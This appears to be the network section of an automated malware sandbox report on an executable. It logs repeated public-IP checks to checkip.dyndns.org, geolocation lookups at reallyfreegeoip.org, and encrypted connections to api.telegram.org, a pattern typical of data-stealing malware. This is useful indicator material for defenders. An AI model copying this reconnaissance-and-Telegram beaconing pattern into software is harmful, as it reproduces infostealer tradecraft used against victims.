Jan 11, 2025 08:08:40.528796911 CET	49821	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:40.528840065 CET	443	49821	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:40.528919935 CET	49821	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:40.529268026 CET	49821	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:40.529278040 CET	443	49821	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:40.576971054 CET	49815	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:41.011307955 CET	443	49821	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:41.013288021 CET	49821	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:41.013312101 CET	443	49821	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:41.140933990 CET	443	49821	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:41.140996933 CET	443	49821	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:41.141139030 CET	49821	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:41.142102003 CET	49821	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:41.193156958 CET	49815	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:41.198134899 CET	80	49815	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:41.198199034 CET	49815	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:41.204442024 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:41.204478025 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:41.204658031 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:41.205077887 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:41.205087900 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:41.832700014 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:41.832915068 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:41.834763050 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:41.834777117 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:41.835031033 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:41.836345911 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:41.879328966 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:42.078249931 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:42.078340054 CET	443	49824	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:42.078428030 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:42.146946907 CET	49824	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:48.678025007 CET	49874	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:48.678052902 CET	443	49874	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:48.678112030 CET	49874	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:48.678436995 CET	49874	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:48.678451061 CET	443	49874	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:49.295169115 CET	443	49874	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:49.297076941 CET	49874	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:49.297115088 CET	443	49874	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:49.297171116 CET	49874	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:49.297177076 CET	443	49874	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:49.471709013 CET	443	49874	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:49.471790075 CET	443	49874	149.154.167.220	192.168.2.9
Jan 11, 2025 08:08:49.471847057 CET	49874	443	192.168.2.9	149.154.167.220
Jan 11, 2025 08:08:49.472450018 CET	49874	443	192.168.2.9	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:08:31.063249111 CET	61059	53	192.168.2.9	1.1.1.1
Jan 11, 2025 08:08:31.071763992 CET	53	61059	1.1.1.1	192.168.2.9
Jan 11, 2025 08:08:32.023024082 CET	63621	53	192.168.2.9	1.1.1.1
Jan 11, 2025 08:08:32.030275106 CET	53	63621	1.1.1.1	192.168.2.9
Jan 11, 2025 08:08:41.193849087 CET	57125	53	192.168.2.9	1.1.1.1
Jan 11, 2025 08:08:41.200885057 CET	53	57125	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 08:08:31.063249111 CET	192.168.2.9	1.1.1.1	0x65a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.023024082 CET	192.168.2.9	1.1.1.1	0x8ef	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:41.193849087 CET	192.168.2.9	1.1.1.1	0x99d4	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 08:08:24.345695019 CET	1.1.1.1	192.168.2.9	0xc943	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 08:08:24.345695019 CET	1.1.1.1	192.168.2.9	0xc943	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:31.071763992 CET	1.1.1.1	192.168.2.9	0x65a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 08:08:31.071763992 CET	1.1.1.1	192.168.2.9	0x65a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:31.071763992 CET	1.1.1.1	192.168.2.9	0x65a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:31.071763992 CET	1.1.1.1	192.168.2.9	0x65a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:31.071763992 CET	1.1.1.1	192.168.2.9	0x65a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:31.071763992 CET	1.1.1.1	192.168.2.9	0x65a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.030275106 CET	1.1.1.1	192.168.2.9	0x8ef	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.030275106 CET	1.1.1.1	192.168.2.9	0x8ef	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.030275106 CET	1.1.1.1	192.168.2.9	0x8ef	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.030275106 CET	1.1.1.1	192.168.2.9	0x8ef	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.030275106 CET	1.1.1.1	192.168.2.9	0x8ef	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.030275106 CET	1.1.1.1	192.168.2.9	0x8ef	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:32.030275106 CET	1.1.1.1	192.168.2.9	0x8ef	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:08:41.200885057 CET	1.1.1.1	192.168.2.9	0x99d4	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49747	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:31.089056969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 08:08:31.552875996 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c114ff3151b90e371f143969a07df4a0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 08:08:31.557692051 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 08:08:31.658701897 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b91e6cd0f5941294d63c61ab624a7ac0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 08:08:32.697225094 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 08:08:32.799482107 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 27009aaa3b8a57d97ba8c4554a6753ec Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49761	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:33.637767076 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 08:08:34.093103886 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a004385f76baa229443b4750ae4cea11 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49771	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:34.697932959 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 08:08:35.180303097 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5c0da55dc8347bea9d9fab4d21489fd7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49779	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:35.772748947 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 08:08:36.223711014 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b639ba400521558ead45569dbf8c29d6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49790	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:36.873939991 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 08:08:37.333581924 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 23af81321f6fb675a966c463db933009 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49797	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:37.939665079 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 08:08:38.398200035 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5701afd0388845c1c6f43dbf732936bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49808	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:38.997546911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 08:08:39.460645914 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ef2de852cd31bc783e8caeaf1d2848ac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49815	193.122.130.0	80	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:08:40.069653034 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 08:08:40.527565956 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b468edb7e9940e749e51f7e8e7055c9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49753	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 07:08:32 UTC	865	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894101 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wqs2SM5TbaTt4h6EgQvLrNn%2BgDAdZns8z6Fd%2FDT%2FPX7YRAvsIKacbx%2B5rJ1oLTpSDSwM1m%2F%2Fe1N%2FhQAoDgGkvbYgSg0isi7tt%2BNb2MPqEdfd5xtdicqRbCCM2jP6sNT1P2AD7Qvu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003137fd91e727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1869&rtt_var=706&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1544156&cwnd=234&unsent_bytes=0&cid=f768c117eba7aa9f&ts=181&x=0"
2025-01-11 07:08:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49759	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 07:08:33 UTC	865	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894102 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeVGFuZ0aH8tj2%2BrUZow9YyRC%2By%2BzrebOWMkitoDlClGq4w6%2BIFZ02ayL%2Fq3KczTW8IA00RgwSdGz%2FQUmGkiHRI4ZNvRt2B0F1nIhN28fXFIaEo%2BY4cBd8%2FtQuZkkAr6c0Sfu4Xw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90031384aea0729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1988&rtt_var=756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1436301&cwnd=169&unsent_bytes=0&cid=df39ebaad43169ec&ts=190&x=0"
2025-01-11 07:08:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49766	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 07:08:34 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894103 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdpaRw0Bx9JaE94k43GrjqbaMJOJIC21EGjfCULkaw8IdRg0PdmAZJWmGB1YfTBfkSxxHTpcgdPAEpKs3wzxMbyvncB8QLWUUN%2FxSezNxaRZuN%2FOwyZXkIWbmxe%2B6aVh5Y3T6gYj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003138c690ac34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1414&min_rtt=1404&rtt_var=547&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1961047&cwnd=181&unsent_bytes=0&cid=4c3f2420efa4a094&ts=133&x=0"
